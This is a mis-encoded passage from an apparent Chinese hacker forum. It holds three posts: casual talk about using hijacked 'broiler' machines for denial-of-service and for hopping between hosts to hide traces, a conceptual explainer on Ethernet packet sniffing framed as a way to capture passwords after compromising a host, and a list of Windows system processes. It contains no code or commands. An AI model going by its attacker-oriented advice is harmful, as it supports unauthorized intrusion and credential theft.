拒絕服務(wù)攻擊，那么我們用什么樣<BR>系統(tǒng)的肉雞呢？~~~~恩！marke這個(gè)<BR><BR>問題問的很好~~：）<BR><BR>我喜歡用windows 2000和linux，雖然我一直采用WIN 2000但是告訴大家一個(gè)<BR><BR>好消息我剛剛擁有了自己第一臺(tái)LINUX肉雞，對(duì)我這個(gè)正在學(xué)習(xí)LINUX的家伙來<BR><BR>說，沒事到上面熟悉一下LINUX指令是件很愉快的事。要想學(xué)用這種肉雞必須熟<BR><BR>練DOS指令（指windows)，因?yàn)闆]有圖形界面讓你玩的。做一個(gè)黑客必須適應(yīng)字符化的*作<BR>當(dāng)你*elne*到一臺(tái)你服務(wù)器里（肉雞）<BR><BR><BR>你就可以踏雪無痕了，就象“信息公路牛崽”（搶劫服務(wù)器五角大樓的美國(guó)天才黑客）一<BR><BR>樣先連接到RB、到中東、再繞回美國(guó)本土搶劫服務(wù)器五角大樓，聽上去很神秘吧，其<BR><BR>實(shí)用的原理就是這個(gè)。</DIV>

<DIV class=tpc_content id=read_501>網(wǎng)絡(luò)監(jiān)聽概念<BR><BR><BR>網(wǎng)絡(luò)監(jiān)聽工具的提供給管理員的一類管理工具。使用這種工具，可以監(jiān)視網(wǎng)絡(luò)的狀態(tài)、數(shù)據(jù)流動(dòng)情況以及網(wǎng)絡(luò)上傳輸?shù)男畔ⅰ?<BR><BR>　　但是網(wǎng)絡(luò)監(jiān)聽工具也是黑客們常用的工具。當(dāng)信息以明文的形式在網(wǎng)絡(luò)上傳輸時(shí)，便可以使用網(wǎng)絡(luò)監(jiān)聽的方式來進(jìn)行攻擊。將網(wǎng)絡(luò)接口設(shè)置在監(jiān)聽模式，便可以源源不斷地將網(wǎng)上傳輸?shù)男畔⒔孬@。 <BR><BR>　　網(wǎng)絡(luò)監(jiān)聽可以在網(wǎng)上的任何一個(gè)位置實(shí)施，如局域網(wǎng)中的一臺(tái)主機(jī)、網(wǎng)關(guān)上或遠(yuǎn)程網(wǎng)的調(diào)制解調(diào)器之間等。黑客們用得最多的是截獲用戶的口令。 <BR><BR>　　什么是網(wǎng)絡(luò)監(jiān)聽 <BR><BR>　　網(wǎng)絡(luò)監(jiān)聽是黑客們常用的一種方法。當(dāng)成功地登錄進(jìn)一臺(tái)網(wǎng)絡(luò)上的主機(jī)，并取得了這臺(tái)主機(jī)的超級(jí)用戶的權(quán)限之后，往往要擴(kuò)大戰(zhàn)果，嘗試登錄或者奪取網(wǎng)絡(luò)中其他主機(jī)的控制友。而網(wǎng)絡(luò)監(jiān)聽則是一種最簡(jiǎn)單而且最有效的方法，它常常能輕易地獲得用其他方法很難獲得的信息。 <BR><BR>　　在網(wǎng)絡(luò)上，監(jiān)聽效果最好的地方是在網(wǎng)關(guān)、路由器、防火墻一類的設(shè)備處，通常由網(wǎng)絡(luò)管理員來操作。使用最方便的是在一個(gè)以太網(wǎng)中的任何一臺(tái)上網(wǎng)的主機(jī)上，這是大多數(shù)黑客的做法。<BR><BR><BR><BR><BR>以太網(wǎng)中可以監(jiān)聽的原因 <BR><BR>　　在電話線路和無線電、微波中監(jiān)聽傳輸?shù)男畔⒈容^好理解，但是人們常常不太理解為什么局域網(wǎng)中可以進(jìn)行監(jiān)聽。甚至有人問：能不能監(jiān)聽不在同一網(wǎng)段的信息。下面就講述在以太網(wǎng)中進(jìn)行監(jiān)聽的一些原理。在令牌環(huán)中，道理是相似的。 <BR><BR>　　對(duì)于一個(gè)施行網(wǎng)絡(luò)攻擊的人來說，能攻破網(wǎng)關(guān)、路由器、防火墻的情況極為少見，在這里完全可以由安全管理員安裝一些設(shè)備，對(duì)網(wǎng)絡(luò)進(jìn)行監(jiān)控，或者使用一些專門的設(shè)備，運(yùn)行專門的監(jiān)聽軟件，并防止任何非法訪關(guān)。然而，潛入一臺(tái)不引人注意的計(jì)算機(jī)中，悄悄地運(yùn)行一個(gè)監(jiān)聽程序，一個(gè)黑客是完全可以做到的。監(jiān)聽是非常消耗CPU資源的，在一個(gè)擔(dān)負(fù)繁忙任務(wù)的計(jì)算機(jī)中進(jìn)行監(jiān)聽，可以立即被管理員發(fā)現(xiàn)，因?yàn)樗l(fā)現(xiàn)計(jì)算機(jī)的響應(yīng)速度令人驚奇慢。 <BR><BR>　　對(duì)于一臺(tái)連網(wǎng)的計(jì)算機(jī)，最方便的是在以太網(wǎng)中進(jìn)行監(jiān)聽，只須安裝一個(gè)監(jiān)聽軟件，然后就可以坐在機(jī)器旁瀏覽監(jiān)聽到的信息了。 <BR><BR>　　以太網(wǎng)協(xié)議的工作方式為將要發(fā)送的數(shù)據(jù)包發(fā)往連在一起的所有主機(jī)。在包頭中包含著應(yīng)該接收數(shù)據(jù)包的主機(jī)的正確地址。因此，只有與數(shù)據(jù)包中目標(biāo)地址一致的那臺(tái)主機(jī)才能接收信包。但是，當(dāng)主機(jī)工在監(jiān)聽模式下，無論數(shù)據(jù)包中的目標(biāo)物理地址是什么，主機(jī)都將接收。 <BR><BR>　　在Internet上，有許多這樣的局域網(wǎng)。幾臺(tái)甚至十幾臺(tái)主機(jī)通過一條電纜一個(gè)集線器連在一起。在協(xié)議的高層或用戶看來，當(dāng)同一網(wǎng)絡(luò)中的兩臺(tái)主機(jī)通信時(shí)，源主機(jī)將寫有目的主機(jī)IP地址的數(shù)據(jù)包發(fā)向網(wǎng)關(guān)。但是，這種數(shù)據(jù)包并不能在協(xié)議棧的高層直接發(fā)送出去。要發(fā)送的數(shù)據(jù)包必須從TCP/IP協(xié)議的IP層交給網(wǎng)絡(luò)接口，即數(shù)據(jù)鏈路層。 <BR><BR>　　網(wǎng)絡(luò)接口不能識(shí)別IP地址。在網(wǎng)絡(luò)接口，由IP層來的帶有IP地址的數(shù)據(jù)包又增加了一部分信息：以太幀的幀頭。在帖頭中，有兩個(gè)域分別為只有網(wǎng)絡(luò)接口才能識(shí)別的源主機(jī)和目的主機(jī)的物理地址，這是一個(gè)48位的地址。這個(gè)48位的地址是與IP地址對(duì)應(yīng)的。也就是說，一個(gè)IP地址，必然對(duì)應(yīng)一個(gè)物理地址。對(duì)于作為網(wǎng)關(guān)的主機(jī)，由于它連接了多個(gè)網(wǎng)絡(luò)，因此它同時(shí)具有多個(gè)IP地址，在每個(gè)網(wǎng)絡(luò)中，它都有一個(gè)。發(fā)向局域網(wǎng)之外的幀中攜帶的是網(wǎng)關(guān)的物理地址。<BR><BR><BR><BR><BR>在以太網(wǎng)中，填寫了物理地址的幀從網(wǎng)絡(luò)接口中，也就是從網(wǎng)卡中發(fā)送出去，傳送到物理的線路上。如果局域網(wǎng)是由一條粗纜或細(xì)纜連接機(jī)而成，則數(shù)字信號(hào)在電纜上傳輸，信號(hào)能夠到達(dá)線路上的每一臺(tái)主機(jī)。當(dāng)使用集線器時(shí)，發(fā)送出去的信號(hào)到達(dá)集線器，由集線器再發(fā)向連接在信線器上的每一條線路。于是，在物理線路上傳輸?shù)臄?shù)字信號(hào)也能到達(dá)連接在集線器上的每一主機(jī)。 <BR><BR>　　數(shù)字信號(hào)到達(dá)一臺(tái)主機(jī)的網(wǎng)絡(luò)接口時(shí)，在正常情況下，網(wǎng)絡(luò)接口讀入數(shù)據(jù)幀，進(jìn)行檢查，如果數(shù)據(jù)幀中攜帶的確良物理地址是自己的，或者物理地址是廣播地址，則將數(shù)據(jù)幀交給上層協(xié)議軟件，也就是IP層軟件，否則就將這個(gè)幀丟棄。對(duì)于每一個(gè)到達(dá)網(wǎng)絡(luò)接口的數(shù)據(jù)幀，都要進(jìn)行這個(gè)過程。然而，當(dāng)主機(jī)工作在監(jiān)聽模式下，則所有的數(shù)據(jù)幀都將被交給上層協(xié)議軟件處理。 <BR><BR>　　局域網(wǎng)的這種工作方式，一個(gè)形象的例子是，大房間就像是一個(gè)共享的信道，里面的每個(gè)人好像是一臺(tái)主機(jī)。人們所說的話是信息包，在大房間中到處傳播。當(dāng)我們對(duì)其中某個(gè)人說話時(shí)，所有的人都能聽到。但只有名字相同的那個(gè)人，才會(huì)對(duì)這些話語做出反映，進(jìn)行處理。其余的人聽到了這些談話，只能從發(fā)呆中猜測(cè)，是否在監(jiān)聽他人的談話。 <BR><BR>　　當(dāng)連接在同一條電纜或集線器上的主機(jī)被邏輯地分為幾個(gè)子網(wǎng)時(shí)，如果一臺(tái)主機(jī)處于監(jiān)聽模式下，它還能接收到發(fā)向與自己不在同一子網(wǎng)(使用了不同的掩碼、IP地址和網(wǎng)關(guān))的主機(jī)的那些信包。也就是說，在同一條物理信道上傳輸?shù)乃行畔⒍伎梢员唤邮盏健?<BR><BR>　　許多人會(huì)問：能不能監(jiān)聽不在同一個(gè)網(wǎng)段計(jì)算機(jī)傳輸?shù)男畔?。答案是否定的，一臺(tái)計(jì)算機(jī)只能監(jiān)聽經(jīng)過自己網(wǎng)絡(luò)接口的那些信包。否則，我們將能監(jiān)聽到整個(gè)Internet,情形會(huì)多么可怕。<BR><BR><BR><BR><BR><BR>目前的絕大多數(shù)計(jì)算機(jī)網(wǎng)絡(luò)使用共享的通信信道。從上面的討論中，我們知道，通信信道的共享意味著，計(jì)算機(jī)有可能接收發(fā)向另一臺(tái)計(jì)算機(jī)的信息。 <BR><BR>　　另外，要說明的是，Internet中使用的大部分協(xié)議都是很早設(shè)計(jì)的，許多協(xié)議的實(shí)現(xiàn)都是基于一種非常友好的，通信的雙方充分信任的基礎(chǔ)之上。因此，直到現(xiàn)在，網(wǎng)絡(luò)安全還是非常脆弱的。在通常的網(wǎng)絡(luò)環(huán)境下，用戶的所有信息，包手戶頭和口令信息都是以明文的方式在網(wǎng)上傳輸。因此，對(duì)于一個(gè)網(wǎng)絡(luò)黑客和網(wǎng)絡(luò)攻擊者進(jìn)行網(wǎng)絡(luò)監(jiān)聽，獲得用戶的各種信息并不是一件很困難的事。只要具有初步的網(wǎng)絡(luò)和TCP/IP協(xié)議知識(shí)，便能輕易地從監(jiān)聽到的信息中提取出感興趣的部分。 <BR><BR>　　網(wǎng)絡(luò)監(jiān)聽常常要保存大量的信息，對(duì)收集的信息進(jìn)行大量的整理工作，因此，正在進(jìn)行監(jiān)的機(jī)器對(duì)用戶的請(qǐng)求響應(yīng)很慢。 <BR><BR>　　首先，網(wǎng)絡(luò)監(jiān)聽軟件運(yùn)行時(shí)，需要消耗大量的處理器時(shí)間，如果在此時(shí)，就詳細(xì)地分析包中的內(nèi)容，許多包就會(huì)來不信接收而漏掉。因此，網(wǎng)絡(luò)監(jiān)聽軟件通常都是將監(jiān)聽到的包存放在文件中，待以后再分析。 <BR><BR>　　其次，網(wǎng)絡(luò)中的數(shù)據(jù)包非常復(fù)雜，兩臺(tái)主機(jī)之間即使連續(xù)發(fā)送和接受數(shù)據(jù)包，在監(jiān)聽到的結(jié)果中，中間必然會(huì)夾雜了許多別的主機(jī)交互的數(shù)據(jù)包。監(jiān)聽軟件將同一TCP會(huì)話的包整理到一起，已經(jīng)是很不錯(cuò)了。如果還希望將用戶的詳細(xì)信息整理出瞇，需要根據(jù)協(xié)議對(duì)包進(jìn)行大量的分析。面對(duì)網(wǎng)絡(luò)上如此眾多的協(xié)議，這個(gè)監(jiān)聽軟件將會(huì)十分龐大。 <BR><BR>　　其實(shí)，找這些信息并不是一件難事。只要根據(jù)一定的規(guī)律，很容易將有用的信息一一提取出來。</DIV>

<DIV class=tpc_content id=read_502>系統(tǒng)進(jìn)程信息<BR><BR>[system process] - [system process] - 進(jìn)程信息<BR>進(jìn)程文件: [system process] or [system process]<BR>進(jìn)程名稱: Windows內(nèi)存處理系統(tǒng)進(jìn)程<BR>描述: Windows頁面內(nèi)存管理進(jìn)程，擁有0級(jí)優(yōu)先。<BR><BR><BR>alg - alg.exe - 進(jìn)程信息<BR>進(jìn)程文件: alg or alg.exe<BR>進(jìn)程名稱: 應(yīng)用層網(wǎng)關(guān)服務(wù)<BR>描述: 這是一個(gè)應(yīng)用層網(wǎng)關(guān)服務(wù)用于網(wǎng)絡(luò)共享。<BR><BR><BR>csrss - csrss.exe - 進(jìn)程信息<BR>進(jìn)程文件: csrss or csrss.exe<BR>進(jìn)程名稱: Client/Server Runtime Server Subsystem<BR>描述: 客戶端服務(wù)子系統(tǒng)，用以控制Windows圖形相關(guān)子系統(tǒng)。<BR><BR><BR>ddhelp - ddhelp.exe - 進(jìn)程信息<BR>進(jìn)程文件: ddhelp or ddhelp.exe<BR>進(jìn)程名稱: DirectDraw Helper<BR>描述: DirectDraw Helper是DirectX這個(gè)用于圖形服務(wù)的一個(gè)組成部分。<BR><BR><BR>dllhost - dllhost.exe - 進(jìn)程信息<BR>進(jìn)程文件: dllhost or dllhost.exe<BR>進(jìn)程名稱: DCOM DLL Host進(jìn)程<BR>描述: DCOM DLL Host進(jìn)程支持基于COM對(duì)象支持DLL以運(yùn)行Windows程序。<BR><BR><BR>explorer - explorer.exe - 進(jìn)程信息<BR>進(jìn)程文件: explorer or explorer.exe<BR>進(jìn)程名稱: 程序管理<BR>描述: Windows Program Manager或者Windows Explorer用于控制Windows圖形Shell，包括開始菜單、任務(wù)欄，桌面和文件管理。<BR><BR><BR>inetinfo - inetinfo.exe - 進(jìn)程信息<BR>進(jìn)程文件: inetinfo or inetinfo.exe<BR>進(jìn)程名稱: IIS Admin Service Helper<BR>描述: InetInfo是Microsoft Internet Infomation Services (IIS)的一部分，用于Debug調(diào)試除錯(cuò)。<BR><BR><BR>internat - internat.exe - 進(jìn)程信息<BR>進(jìn)程文件: internat or internat.exe<BR>進(jìn)程名稱: Input Locales<BR>描述: 這個(gè)輸入控制圖標(biāo)用于更改類似國(guó)家設(shè)置、鍵盤類型和日期格式。<BR><BR><BR>kernel32 - kernel32.dll - 進(jìn)程信息<BR>進(jìn)程文件: kernel32 or kernel32.dll<BR>進(jìn)程名稱: Windows殼進(jìn)程<BR>描述: Windows殼進(jìn)程用于管理多線程、內(nèi)存和資源。<BR><BR><BR>lsass - lsass.exe - 進(jìn)程信息<BR>進(jìn)程文件: lsass or lsass.exe<BR>進(jìn)程名稱: 本地安全權(quán)限服務(wù)<BR>描述: 這個(gè)本地安全權(quán)限服務(wù)控制Windows安全機(jī)制。<BR><BR><BR>mdm - mdm.exe - 進(jìn)程信息<BR>進(jìn)程文件: mdm or mdm.exe<BR>進(jìn)程名稱: Machine Debug Manager<BR>描述: Debug除錯(cuò)管理用于調(diào)試應(yīng)用程序和Microsoft Office中的Microsoft script Editor腳本編輯器。<BR><BR><BR>mmtask - mmtask.tsk - 進(jìn)程信息<BR>進(jìn)程文件: mmtask or mmtask.tsk<BR>進(jìn)程名稱: 多媒體支持進(jìn)程<BR>描述: 這個(gè)Windows多媒體后臺(tái)程序控制多媒體服務(wù)，例如MIDI。<BR><BR><BR>mprexe - mprexe.exe - 進(jìn)程信息<BR>進(jìn)程文件: mprexe or mprexe.exe<BR>進(jìn)程名稱: Windows路由進(jìn)程<BR>描述: Windows路由進(jìn)程包括向適當(dāng)?shù)木W(wǎng)絡(luò)部分發(fā)出網(wǎng)絡(luò)請(qǐng)求。<BR><BR><BR>msgsrv32 - msgsrv32.exe - 進(jìn)程信息<BR>進(jìn)程文件: msgsrv32 or msgsrv32.exe<BR>進(jìn)程名稱: Windows信使服務(wù)<BR>描述: Windows信使服務(wù)調(diào)用Windows驅(qū)動(dòng)和程序管理在啟動(dòng)。<BR><BR><BR>mstask - mstask.exe - 進(jìn)程信息<BR>進(jìn)程文件: mstask or mstask.exe<BR>進(jìn)程名稱: Windows計(jì)劃任務(wù)<BR>描述: Windows計(jì)劃任務(wù)用于設(shè)定繼承在什么時(shí)間或者什么日期備份或者運(yùn)行。<BR><BR><BR>regsvc - regsvc.exe - 進(jìn)程信息<BR>進(jìn)程文件: regsvc or regsvc.exe<BR>進(jìn)程名稱: 遠(yuǎn)程注冊(cè)表服務(wù)<BR>描述: 遠(yuǎn)程注冊(cè)表服務(wù)用于訪問在遠(yuǎn)程計(jì)算機(jī)的注冊(cè)表。<BR><BR><BR>rpcss - rpcss.exe - 進(jìn)程信息<BR>進(jìn)程文件: rpcss or rpcss.exe<BR>進(jìn)程名稱: RPC Portmapper<BR>描述: Windows 的RPC端口映射進(jìn)程處理RPC調(diào)用(遠(yuǎn)程模塊調(diào)用)然后把它們映射給指定的服務(wù)提供者。<BR><BR><BR>services - services.exe - 進(jìn)程信息<BR>進(jìn)程文件: services or services.exe<BR>進(jìn)程名稱: Windows Service Controller<BR>描述: 管理Windows服務(wù)。<BR><BR><BR>smss - smss.exe - 進(jìn)程信息<BR>進(jìn)程文件: smss or smss.exe<BR>進(jìn)程名稱: Session Manager Subsystem<BR>描述: 該進(jìn)程為會(huì)話管理子系統(tǒng)用以初始化系統(tǒng)變量，MS-DOS驅(qū)動(dòng)名稱類似LPT1以及COM，調(diào)用Win32殼子系統(tǒng)和運(yùn)行在Windows登陸過程。<BR><BR><BR>snmp - snmp.exe - 進(jìn)程信息<BR>進(jìn)程文件: snmp or snmp.exe<BR>進(jìn)程名稱: Microsoft SNMP Agent<BR>描述: Windows簡(jiǎn)單的網(wǎng)絡(luò)協(xié)議代理（SNMP）用于監(jiān)聽和發(fā)送請(qǐng)求到適當(dāng)?shù)木W(wǎng)絡(luò)部分。<BR><BR><BR>spool32 - spool32.exe - 進(jìn)程信息<BR>進(jìn)程文件: spool32 or spool32.exe<BR>進(jìn)程名稱: Printer Spooler<BR>描述: Windows打印任務(wù)控制程序，用以打印機(jī)就緒。<BR><BR><BR>spoolsv - spoolsv.exe - 進(jìn)程信息<BR>進(jìn)程文件: spoolsv or spoolsv.exe<BR>進(jìn)程名稱: Printer Spooler Service<BR>描述: Windows打印任務(wù)控制程序，用以打印機(jī)就緒。<BR><BR><BR>stisvc - stisvc.exe - 進(jìn)程信息<BR>進(jìn)程文件: stisvc or stisvc.exe<BR>進(jìn)程名稱: Still Image Service<BR>描述: Still Image Service用于控制掃描儀和數(shù)碼相機(jī)連接在Windows。<BR><BR><BR>svchost - svchost.exe - 進(jìn)程信息<BR>進(jìn)程文件: svchost or svchost.exe<BR>進(jìn)程名稱: Service Host Process<BR>描述: Service Host Process是一個(gè)標(biāo)準(zhǔn)的動(dòng)態(tài)連接庫(kù)主機(jī)處理服務(wù)。<BR><BR><BR>system - system - 進(jìn)程信息<BR>進(jìn)程文件: system or system<BR>進(jìn)程名稱: Windows System Process<BR>描述: Microsoft Windows系統(tǒng)進(jìn)程。<BR><BR><BR>taskmon - taskmon.exe - 進(jìn)程信息<BR>進(jìn)程文件: taskmon or taskmon.exe<BR>進(jìn)程名稱: Windows Task Optimizer<BR>描述: windows任務(wù)優(yōu)化器監(jiān)視你使用某個(gè)程序的頻率，并且通過加載那些經(jīng)常使用的程序來整理優(yōu)化硬盤。 <BR><BR><BR>tcpsvcs - tcpsvcs.exe - 進(jìn)程信息<BR>進(jìn)程文件: tcpsvcs or tcpsvcs.exe<BR>進(jìn)程名稱: TCP/IP Services<BR>描述: TCP/IP Services Application支持透過TCP/IP連接局域網(wǎng)和Internet。<BR><BR><BR>winlogon - winlogon.exe - 進(jìn)程信息<BR>進(jìn)程文件: winlogon or winlogon.exe<BR>進(jìn)程名稱: Windows Logon Process<BR>描述: Windows NT用戶登陸程序。<BR><BR><BR>winmgmt - winmgmt.exe - 進(jìn)程信息<BR>進(jìn)程文件: winmgmt or winmgmt.exe<BR>進(jìn)程名稱: Windows Management Service<BR>描述: Windows Management Service透過Windows Management Instrumentation data (WMI)技術(shù)處理來自應(yīng)用客戶端的請(qǐng)求</DIV>